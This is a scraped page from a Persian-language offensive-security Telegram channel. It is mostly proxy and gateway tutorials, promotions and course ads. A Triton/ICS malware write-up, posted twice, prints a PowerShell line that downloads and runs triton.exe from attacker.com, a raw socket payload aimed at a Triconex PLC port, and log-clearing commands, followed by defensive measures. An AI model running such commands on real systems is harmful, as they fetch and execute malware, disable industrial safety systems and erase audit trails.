ru
Feedback
Try Hack Box

Try Hack Box

Открыть в Telegram

1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفه‌ای شو.

Больше
6 476
Подписчики
+224 часа
+627 дней
+11330 дней
Архив постов
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید : 💠 کانال های تلگرام ما 🔶 آموزش تست نفوذ و Red Team 🆔 @TryHackBox 🔶 رودمپ های مختلف 🆔 @TryHackBoxOfficial 🔶 داستان های هک 🆔 @TryHackBoxStory 🔶 آموزش برنامه نویسی 🆔 @TryCodeBox 🔶 رادیو زیروپاد ( پادکست ها ) 🆔 @RadioZeroPod ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 👥 گروه های پرسش و پاسخ 🔷 هک و امنیت 🆔 @TryHackBoxGroup 🔷 برنامه نویسی 🆔 @TryCodeBoxGroup ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 🔴 اینستاگرام : 🔗 http://www.instagram.com/TryHackBox 🔵 یوتیوب : 🔗 https://youtube.com/@tryhackbox 🟠 گیت هاب ما : 🔗 https://github.com/TryHackBox/

🔹کنترل‌کنندهٔ دسترسی به اسناد (Document Access Controller) سرورهای پراکسی می‌توانند برای پیاده‌سازی یک استراتژی متمرکز کنترل دسترسی در مجموعه‌های بزرگ از وب‌سرورها و منابع وب مورد استفاده قرار گیرند. این کاربرد در سازمان‌های بزرگ با ساختارهای بروکراتیک، بسیار رایج و مؤثر است. ✅ مزیت اصلی: امکان مدیریت متمرکز دسترسی بدون نیاز به پیکربندی مجزای هر سرور وب. 🔐 مثال: پراکسی کنترل دسترسی در تصویر مفهومی زیر، یک پراکسی مرکزی تعیین می‌کند که کدام کلاینت به کدام منبع وب دسترسی داشته باشد:
[Client A] ─> [Proxy Access Controller] ─> [Server A: News Pages]
                │
                └── Allows access to news pages only
[Client B] ─> [Proxy Access Controller] ─> [All Internet Content]
                │
                └── Unlimited access allowed
[Client C] ─> [Proxy Access Controller] ─> [Server B: Requires Password]
                │
                └── Access granted only after password authentication
🔹فایروال امنیتی (Security Firewall) مهندسان امنیت شبکه اغلب از پراکسی‌ها برای افزایش امنیت و اعمال سیاست‌های محدودکننده استفاده می‌کنند. این پراکسی‌ها به‌عنوان لایهٔ میانی بین داخل و خارج از سازمان، در نقاط امن شبکه قرار می‌گیرند. ویژگی‌ها: * کنترل پروتکل‌های سطح Application * بررسی دقیق ترافیک عبوری * امکان استفاده از Security Hooks * قابلیت حذف یا بازنویسی درخواست‌های مخرب 🔹 کش وب (Web cache) پراکسی کش (Proxy Cache) می‌تواند اسناد و فایل‌های محبوب را ذخیره کرده و هنگام درخواست مجدد، آن‌ها را مستقیماً ارائه دهد. این کار باعث کاهش بار شبکه و کاهش تأخیر کاربر می‌شود. 📦 مثال: اشتراک کش بین کاربران (Web Cache Sharing Example) فرض کنید یک پراکسی کش در سازمان یا شبکه مدرسه‌ای قرار دارد. این پراکسی، اسناد و صفحات محبوبی را که کاربران قبلاً درخواست داده‌اند، در حافظهٔ خود نگه می‌دارد. اکنون سه کاربر در شبکه هستند: کاربر ۱ (Client 1) برای اولین بار یک سند وب (مثلاً یک مقاله یا تصویر) را درخواست می‌کند. چون این سند هنوز در کش موجود نیست، پراکسی آن را از سرور اصلی دریافت کرده و هم‌زمان، نسخه‌ای را در کش ذخیره می‌کند. کاربر ۲ (Client 2) پس از مدتی همان سند را درخواست می‌کند. این بار پراکسی دیگر نیازی به تماس با سرور اصلی ندارد، بلکه نسخهٔ ذخیره‌شده در کش را مستقیماً برای کاربر ۲ ارسال می‌کند. این فرآیند سریع‌تر، کم‌هزینه‌تر و بهینه‌تر است. کاربر ۳ (Client 3) می‌خواهد سندی را دریافت کند که هنوز در کش وجود ندارد یا دسترسی به آن برایش محدود شده است. بنابراین پراکسی یا باید سند را از سرور مبدا بگیرد، یا به دلیل محدودیت دسترسی (مثلاً کنترل دسترسی بر اساس نقش کاربر)، دسترسی را مسدود کند. * کلاینت‌های 1 و 2 می‌توانند سند ذخیره‌شده در کش را دریافت کنند. * کلاینت 3 به آن سند خاص دسترسی ندارد و باید از سرور مبدا درخواست کند. ✍️نویسنده @TryHackBox | The Chaos #HTTP #Proxy #CyberSecurity

🚀 آموزش Proxies (پارت 2) 🔹چرا از پراکسی استفاده می‌کنیم؟ سرورهای پراکسی می‌توانند امنیت را بهبود بخشند، عملکرد را افزایش ده
🚀 آموزش Proxies (پارت 2) 🔹چرا از پراکسی استفاده می‌کنیم؟ سرورهای پراکسی می‌توانند امنیت را بهبود بخشند، عملکرد را افزایش دهند و در هزینه‌ها صرفه‌جویی کنند. از آنجا که سرورهای پراکسی می‌توانند تمام ترافیک عبوری را مشاهده و کنترل کنند، استفاده از آن‌ها در بسیاری از سرویس‌های مبتنی بر HTTP باعث بهبود عملکرد، نظارت، و تغییر مسیر ترافیک می‌شود. به طور مثال: 🧒 فیلتر کودک ✅ دسترسی مجاز به محتوای آموزشی:
[Child User] 
      │
      ▼
[Browser: Dinosaurs Online]
      │
      ▼
[School's Filtering Proxy]
      │        → Analyzes requested content
      ▼
     OK       → Access granted
      ▼
[Internet] ───► [Educational Website Server]
                (Content: Dinosaurs, science, etc.)
❌ مسدودسازی دسترسی به محتوای نامناسب:
[Child User] 
      │
      ▼
[Browser: Adult Content Site]
      │
      ▼
[School's Filtering Proxy]
      │        → Detects inappropriate content
      ▼
     DENY     → Access blocked
      ✖️
(No connection to the server)
✍️نویسنده @TryHackBox | The Chaos #HTTP #Proxy #CyberSecurity

✅ ثبت نام دوره جامع SOC Tier 1 ویژه بازار کار - با تخفیف ویژه ۵۰٪! اگه دنبال ورود حرفه‌ای به دنیای امنیت سایبری و تیم‌های Blue Team هستی، این دوره دقیقاً برای تو طراحی شده! ✅ آموزش ۹ فصل کاملاً کاربردی، با محوریت مهارت‌های مورد نیاز بازار کار ✅ شامل ابزارهای روز دنیای SOC، از Splunk و Zeek تا Snort و Packet Analysis ✅ ارائه تجربه عملی، پروژه‌محور و قابل استفاده در موقعیت‌های شغلی واقعی ✅ ۵۰٪ تخفیف ویژه ثبت‌نام برای مدت محدود ✅ مشاوره رایگان قبل از ثبت‌نام ✅ سرفصل های کامل در pdf موجود می باشد. 📩 برای دریافت مشاوره رایگان و ثبت‌نام، از طریق آیدی تلگرام زیر در تماس باش: 👉 @steymouri93 مارو به دوستاتون معرفی کنید. 🆔 @sajjadteymouri

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 دوره ها و منابع Cyber Security ⭕ @BackupLSO 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  : ⭕ @PfkCTF 💠 برای اضافه شدن در لیست پیام دهید : 🤖 @THBxSupport ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

📚 کتابچه "Mimikatz راهنمای عملی هکرها: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در
+3
📚 کتابچه "Mimikatz راهنمای عملی هکرها: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید! منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند. همین حالا این کتاب تخصصی را به زبان فارسی بخوانید. 💰 قیمت : ۲۵۰,۰۰۰ تومان  📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

🔵 تفاوت Proxy و Gateway در یک نگاه 📌 Proxy: * مانند یک واسطهٔ نامرئی عمل می‌کند. * برنامه‌ها با پروتکل یکسان (مثل HTTP) را به هم متصل می‌کند. مثال کاربردی: وقتی از یک پروکسی برای عبور از فیلترینگ استفاده می‌کنید، مرورگر شما (کلاینت) و سرور مقصد هر دو از پروتکل HTTP/HTTPS استفاده می‌کنند. پروکسی در میان آنها قرار می‌گیرد تا ارتباط را تغییر مسیر دهد. 📌 Gateway: * مانند یک مترجم بین دو سیستم با پروتکل‌های متفاوت عمل می‌کند. * برنامه‌ها با پروتکل‌های مختلف (مثل HTTP به SMTP) را به هم متصل می‌کند. مثال کاربردی: وقتی ایمیل خود را از طریق مرورگر (HTTP) چک می‌کنید، Gateway پروتکل HTTP را به SMTP یا POP (پروتکل‌های ایمیل) تبدیل می‌کند تا بتوانید پیام‌ها را دریافت کنید. 🔵 مقایسه عملکرد 📌 Proxy: * مرورگر (Browser) با پروتکل HTTP به پروکسی متصل می‌شود. * پروکسی نیز با همان پروتکل HTTP به سرور وب ارتباط برقرار می‌کند. * کاربرد: تغییر مسیر ترافیک، افزایش امنیت، یا دور زدن محدودیت‌ها. [مرورگر (HTTP)] -> [پروکسی (HTTP)] -> [وب‌سرور (HTTP)] 📌 Gateway: * مرورگر (Browser) با پروتکل HTTP به گیت‌وی متصل می‌شود. * گیت‌وی، پروتکل HTTP را به POP (برای دریافت ایمیل) یا SMTP (برای ارسال ایمیل) تبدیل می‌کند. * سپس با سرور ایمیل ارتباط برقرار می‌کند. * کاربرد: دسترسی به ایمیل از طریق مرورگر، بدون نیاز به نرم‌افزار خاص. [مرورگر (HTTP)] -> [Getway: تبدیل HTTP به POP] -> [سرور ایمیل (POP)] ✍️نویسنده @TryHackBox | The Chaos #HTTP #Proxy #CyberSecurity #Getway

🔵 تفاوت Proxy و Gateway در یک نگاه 📌 Proxy: * مانند یک واسطهٔ نامرئی عمل می‌کند. * برنامه‌ها با پروتکل یکسان (مثل HTTP) را به هم متصل می‌کند. مثال کاربردی: وقتی از یک پروکسی برای عبور از فیلترینگ استفاده می‌کنید، مرورگر شما (کلاینت) و سرور مقصد هر دو از پروتکل HTTP/HTTPS استفاده می‌کنند. پروکسی در میان آنها قرار می‌گیرد تا ارتباط را تغییر مسیر دهد. 📌 Gateway: * مانند یک مترجم بین دو سیستم با پروتکل‌های متفاوت عمل می‌کند. * برنامه‌ها با پروتکل‌های مختلف (مثل HTTP به SMTP) را به هم متصل می‌کند. مثال کاربردی: وقتی ایمیل خود را از طریق مرورگر (HTTP) چک می‌کنید، Gateway پروتکل HTTP را به SMTP یا POP (پروتکل‌های ایمیل) تبدیل می‌کند تا بتوانید پیام‌ها را دریافت کنید. 🔵 مقایسه عملکرد 📌 Proxy: * مرورگر (Browser) با پروتکل HTTP به پروکسی متصل می‌شود. * پروکسی نیز با همان پروتکل HTTP به سرور وب ارتباط برقرار می‌کند. * کاربرد: تغییر مسیر ترافیک، افزایش امنیت، یا دور زدن محدودیت‌ها. [مرورگر (HTTP)] -> [پروکسی (HTTP)] -> [وب‌سرور (HTTP)] 📌 Gateway: * مرورگر (Browser) با پروتکل HTTP به گیت‌وی متصل می‌شود. * گیت‌وی، پروتکل HTTP را به POP (برای دریافت ایمیل) یا SMTP (برای ارسال ایمیل) تبدیل می‌کند. * سپس با سرور ایمیل ارتباط برقرار می‌کند. * کاربرد: دسترسی به ایمیل از طریق مرورگر، بدون نیاز به نرم‌افزار خاص. [مرورگر (HTTP)] -> [Getway: تبدیل HTTP به POP] -> [سرور ایمیل (POP)] ✍️نویسنده @TryHackBox | The Chaos #HTTP #Proxy #CyberSecurity #Getway

🚀 آموزش Proxies (پارت 1) 🔵 انواع پروکسی: اختصاصی، اشتراکی و عمومی پروکسی اختصاصی (Private Proxy): این نوع پروکسی به یک کارب
🚀 آموزش Proxies (پارت 1) 🔵 انواع پروکسی: اختصاصی، اشتراکی و عمومی پروکسی اختصاصی (Private Proxy): این نوع پروکسی به یک کاربر یا کلاینت خاص اختصاص داده میشود و به آن پروکسی خصوصی میگویند. مناسب برای استفاده های شخصی، افزایش امنیت و حفظ حریم خصوصی. پروکسی اشتراکی (Shared Proxy): این پروکسی بین چندین کاربر به اشتراک گذاشته میشود و به آن پروکسی معمولی میگویند. مقرون به صرفه تر است، اما ممکن است سرعت و امنیت کمتری داشته باشد. پروکسی عمومی (Public Proxy): رایگان و برای عموم قابل دسترس است. معمولاً توسط سرویسهای مختلف ارائه میشود، اما به دلیل استفادهی همزمان کاربران زیاد، ممکن است ناپایدار یا کند باشد. 🔹 کاربردها:    - پروکسی اختصاصی: مناسب برای فعالیتهای حساس، مانند مدیریت چند اکانت یا دور زدن محدودیت ها.    - پروکسی اشتراکی: گزینه ی اقتصادی برای کاربران عادی.    - پروکسی عمومی: برای دسترسی سریع و موقت، اما با ریسک امنیتی بالاتر. ✅ انتخاب هوشمندانه پروکسی = امنیت + سرعت + کارایی بهتر! ✍️نویسنده @TryHackBox | The Chaos #HTTP #Proxy #CyberSecurity

⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید : 💠 کانال های تلگرام ما 🔶 آموزش تست نفوذ و Red Team 🆔 @TryHackBox 🔶 رودمپ های مختلف 🆔 @TryHackBoxOfficial 🔶 داستان های هک 🆔 @TryHackBoxStory 🔶 آموزش برنامه نویسی 🆔 @TryCodeBox 🔶 رادیو زیروپاد ( پادکست ها ) 🆔 @RadioZeroPod ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 👥 گروه های پرسش و پاسخ 🔷 هک و امنیت 🆔 @TryHackBoxGroup 🔷 برنامه نویسی 🆔 @TryCodeBoxGroup ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 🔴 اینستاگرام : 🔗 http://www.instagram.com/TryHackBox 🔵 یوتیوب : 🔗 https://youtube.com/@tryhackbox

دوستان سر فرصت بحث مهندسی اجتماعی بازترش میکنیم الان درگیر اماده کردن کتاب جدید هستم .

💢 مهندسی اجتماعی در رد تیمینگ در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم. #مهندسی_اجتماعی @TryHackBox

🚨 ۹۵٪ از شرکت‌های آمریکایی از هوش مصنوعی مولد (Generative AI) استفاده می‌کنند — اغلب بدون اطلاع تیم IT! 🧠 ابزارهای هوش مصنو
🚨 ۹۵٪ از شرکت‌های آمریکایی از هوش مصنوعی مولد (Generative AI) استفاده می‌کنند — اغلب بدون اطلاع تیم IT! 🧠 ابزارهای هوش مصنوعی مثل ChatGPT، Gemini، Copilot و Claude در حال حاضر در اکثر شرکت‌ها مورد استفاده قرار می‌گیرند. اما مشکل کجاست؟ 📤 داده‌های حساس شامل اطلاعات مشتری، کد منبع، قراردادها و حتی اطلاعات مالی بدون هیچ نظارت یا محدودیتی وارد این ابزارها می‌شوند. ⚠️ این پدیده جدید به نام "Shadow AI" شناخته می‌شود: استفاده پنهانی از هوش مصنوعی توسط کارمندان، بدون هماهنگی با واحد IT یا امنیت. 📚 منبع اصلی خبر: The Hacker News – Shadow AI in 2025 ✍️نویسنده @TryHackBox | TheChaos #ShadowAI #AIsecurity #DataPrivacy #GenerativeAI #CyberSecurity #AIThreats #GPT #InfoSec #News

🔖بازگشت سایه‌ی استاکس‌نت – قسمت دوم بدافزاری که سیستم‌های ایمنی صنعتی (SIS) رو هدف گرفت 💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاه‌ها با هدف ایجاد فاجعه انسانی 📌 فاز اول: شناخت سیستم‌های SIS و آسیب‌پذیری‌ها سیستم‌های SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانه‌ها و نیروگاه‌ها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستم‌ها رو خاموش کنه یا کنترل‌شون رو بدست بگیره. 💻 سیستم‌های هدف: Triconex SIS ساخت Schneider Electric PLCهای خاص با دسترسی شبکه به پورت 18245 📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار گزارش FireEye نشون داده که مهاجم‌ها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسی‌های RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند. نمونه دستورات نصب بدافزار:
Invoke-WebRequest -Uri http://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe 
📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار می‌کنه و کدهای امنیتی رو تغییر می‌ده یا کاملاً سیستم رو از کار می‌اندازه. نمونه کد بازسازی‌شده (Pseudo Python):
import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)
📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی با اجرای فرمان‌های بدافزار، سیستم‌های ایمنی به حالت Fail-safe نمی‌رن بلکه خاموش می‌شن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفه‌اش عمل نمی‌کنه و باعث حادثه بزرگ می‌شه. فاز پنجم: پاک‌سازی ردپا و استتار توطئه‌گران ردپای خود را با حذف لاگ‌ها و بازنویسی تاریخچه فرمان‌ها پاک کردند. دستورات پاک‌سازی:
wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"
🔶 روش‌های مقابله و پیشگیری - پیاده‌سازی فیلترهای دقیق در فایروال‌های صنعتی - نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول - آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ - استفاده از سیستم‌های IDS/IPS تخصصی برای ICS - ایزوله‌سازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت 📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساخت‌های حیاتی جهان است که حمله‌های سایبری می‌توانند به قیمت جان انسان‌ها تمام شوند. کنترل سیستم‌های ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است. ✍️نویسنده @TryHackBox| Condor #ICS #SCADA #CyberWarfare #APT #Triton #InfoSec

🔖بازگشت سایه‌ی استاکس‌نت – قسمت دوم بدافزاری که سیستم‌های ایمنی صنعتی (SIS) رو هدف گرفت 💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاه‌ها با هدف ایجاد فاجعه انسانی 📌 فاز اول: شناخت سیستم‌های SIS و آسیب‌پذیری‌ها سیستم‌های SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانه‌ها و نیروگاه‌ها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستم‌ها رو خاموش کنه یا کنترل‌شون رو بدست بگیره. 💻 سیستم‌های هدف: Triconex SIS ساخت Schneider Electric PLCهای خاص با دسترسی شبکه به پورت 18245 📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار گزارش FireEye نشون داده که مهاجم‌ها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسی‌های RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند. نمونه دستورات نصب بدافزار:
Invoke-WebRequest -Uri http://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe 
📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار می‌کنه و کدهای امنیتی رو تغییر می‌ده یا کاملاً سیستم رو از کار می‌اندازه. نمونه کد بازسازی‌شده (Pseudo Python):
import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)
📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی با اجرای فرمان‌های بدافزار، سیستم‌های ایمنی به حالت Fail-safe نمی‌رن بلکه خاموش می‌شن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفه‌اش عمل نمی‌کنه و باعث حادثه بزرگ می‌شه. فاز پنجم: پاک‌سازی ردپا و استتار توطئه‌گران ردپای خود را با حذف لاگ‌ها و بازنویسی تاریخچه فرمان‌ها پاک کردند. دستورات پاک‌سازی:
wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"
🔶 روش‌های مقابله و پیشگیری - پیاده‌سازی فیلترهای دقیق در فایروال‌های صنعتی - نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول - آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ - استفاده از سیستم‌های IDS/IPS تخصصی برای ICS - ایزوله‌سازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت 📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساخت‌های حیاتی جهان است که حمله‌های سایبری می‌توانند به قیمت جان انسان‌ها تمام شوند. کنترل سیستم‌های ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است. @TryHackBox| Condor #ICS #SCADA #CyberWarfare #APT #Triton #InfoSec

اگه دنبال اخبار، دوره های رایگان، لایوها، کنفرانس ها و آموزش در حوزه امنیت سایبری هستید، به ما ملحق بشید : ➡️ @onhex_ir ➡️ We
اگه دنبال اخبار، دوره های رایگان، لایوها، کنفرانس ها و آموزش در حوزه امنیت سایبری هستید، به ما ملحق بشید : ➡️ @onhex_ir ➡️ WebSite

💢 مهندسی اجتماعی در رد تیمینگ در حوزه‌ی امنیت سایبری، عنصر انسانی اغلب ضعیف‌ترین قسمت است. مهندسی اجتماعی از این ضعف بهره‌برداری می‌کند و با فریب افراد، آن‌ها را وادار به فاش کردن اطلاعات محرمانه یا انجام اقداماتی می‌کند که امنیت را به خطر می‌اندازد. برای اعضای رد تیم ، تسلط بر فنون مهندسی اجتماعی بسیار مهم است تا بتوانند حملاتی واقعی را شبیه‌سازی کرده و مقاومت سازمان در برابر این تهدیدات را ارزیابی کنند. به زودی به جزئیات مهندسی اجتماعی، روش‌ها، ابزارها، فنون و تأثیر عمیقی که می‌تواند بر امنیت سازمانی بگذارد می‌پردازیم. به زودی .... #مهندسی_اجتماعی @TryHackBox

Repost from Try Hack Box
🔥 نمونه‌ای از چک‌لیست برای یک buughunter و pentester با 500 مورد تست، بر اساس OWASP. #bugbounty @TryHackBox

📌 پروکسی‌ها در واقع واسطه‌هایی هستند که بین کلاینت‌ها و سرورها قرار می‌گیرند و مانند یک نماینده عمل می‌کنند. 🌍 مثال روزمره: فرض کنید می‌خواهید نامه‌ای به یک شرکت بفرستید، اما به جای ارسال مستقیم، آن را به دفتر پستی می‌سپارید. دفتر پستی نامه را دریافت می‌کند، آدرس را بررسی می‌کند، سپس آن را به مقصد نهایی می‌رساند. حتی ممکن است قبل از ارسال، محتوای نامه را بررسی کند یا آن را در یک پاکت جدید بگذارد. 🔹 پروکسی هم دقیقاً همین‌طور کار می‌کند! وقتی شما به اینترنت متصل می‌شوید، درخواست‌های شما ابتدا به پروکسی می‌رود. پروکسی می‌تواند درخواست را تغییر دهد، فیلتر کند یا کش کند و سپس به سرور اصلی ارسال کند. پاسخ سرور هم ابتدا به پروکسی برمی‌گردد و بعد به شما می‌رسد. 💡 پروکسی مثل همان دفتر پستی است: واسطه‌ای که ارتباط شما با دنیای اینترنت را مدیریت می‌کند! 🔍 واسطه‌های وب (Web Intermediaries) چیستند؟ تصور کنید می‌خواهید با یک فروشگاه آنلاین ارتباط برقرار کنید: 📱 بدون پروکسی (ارتباط مستقیم): شما (کلاینت) ← مستقیماً به فروشگاه (سرور) 🖥 با پروکسی (ارتباط با واسطه): شما ← پروکسی ← فروشگاه ✨ به زبان ساده: پروکسی مثل یک رابط هوشمند عمل می‌کند که:      - درخواست‌های شما را دریافت می‌کند      - به جای شما با سرور اصلی ارتباط برقرار می‌کند      - پاسخ را از سرور گرفته      - و در نهایت آن را به شما تحویل می‌دهد 💡 مثل یک مترجم یا نماینده: دقیقاً همانطور که در مذاکرات بین‌المللی از مترجم استفاده می‌شود، پروکسی هم بین شما و سرورهای اینترنتی واسطه می‌شود تا ارتباط به بهترین شکل ممکن برقرار شود. 🌐 نحوه عملکرد:      - بدون پروکسی، کلاینت‌ها مستقیماً با سرورهای HTTP ارتباط برقرار می‌کنند      - با وجود پروکسی، کلاینت با سرور پروکسی صحبت می‌کند      - پروکسی به نمایندگی از کلاینت با سرور اصلی ارتباط برقرار می‌نماید      - کلاینت تراکنش را کامل انجام می‌دهد، اما از خدمات ارزشمند پروکسی بهره می‌برد 🔄 ویژگی‌های کلیدی:      - هم به عنوان سرور وب (برای کلاینت)      - هم به عنوان کلاینت وب (برای سرور اصلی) عمل می‌کند      - درخواست‌های HTTP را به سرورهای مناسب ارسال می‌کند      - اتصالات و درخواست‌ها را مدیریت می‌نماید      - پاسخ‌ها را دقیقاً مانند یک وب سرور بازمی‌گرداند ⚙️ مهم‌ترین وظایف:      - ارسال درخواست‌های HTTP به سرورها      - دریافت و پردازش پاسخ‌ها      - رعایت دقیق پروتکل‌های HTTP      - مدیریت صحیح تراکنش‌ها بین کلاینت و سرور ✍️نویسنده @TryHackBox| The Chaos #HTTP #Proxy #CyberSecurity